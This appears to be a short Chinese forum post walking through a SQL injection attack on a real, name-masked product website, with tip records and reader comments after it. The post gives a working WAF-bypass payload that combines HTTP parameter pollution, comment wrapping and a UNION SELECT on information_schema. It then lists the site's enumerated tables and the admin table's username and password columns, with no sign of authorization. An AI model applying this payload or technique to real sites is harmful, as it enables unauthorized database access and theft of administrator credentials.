1.目标网站
2.发现有WAF防护
3.判断存在注入
4.想办法绕过WAF
5.判断字段数
证明有15个字段
6.判断显示位
显示位:4,9
7.查询数据库用户名和数据库名
8.查询表名
http://www.*****.com/product_details.php?id=79/*&id=2‘ union all select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() limit 1,1 %23 */
跑出表名分别是:
admin
banner
config
config_contact
config_footer
feedback
link
log
login_history
news
news_class
product
product_class
9.查询字段名
字段名分别是:
id
username
password
addtime
last_time
del
往下不再进行了…..
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-聂风 | 35.00 | 0 | 2021-05-21 21:09:19 | 继续加油 |
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.
Track-聂风
发表于 2021-5-21
hpp
评论列表
加载数据中...
Track-聂风
发表于 2021-5-21
经典绕WAF方法
评论列表
加载数据中...
山屿云
发表于 2021-5-23
/**/ 666
评论列表
加载数据中...
小酒
发表于 2021-9-1
大佬, 请问, 为啥 url后面加上单引号。会不显示数据。我能加你好友不
评论列表
加载数据中...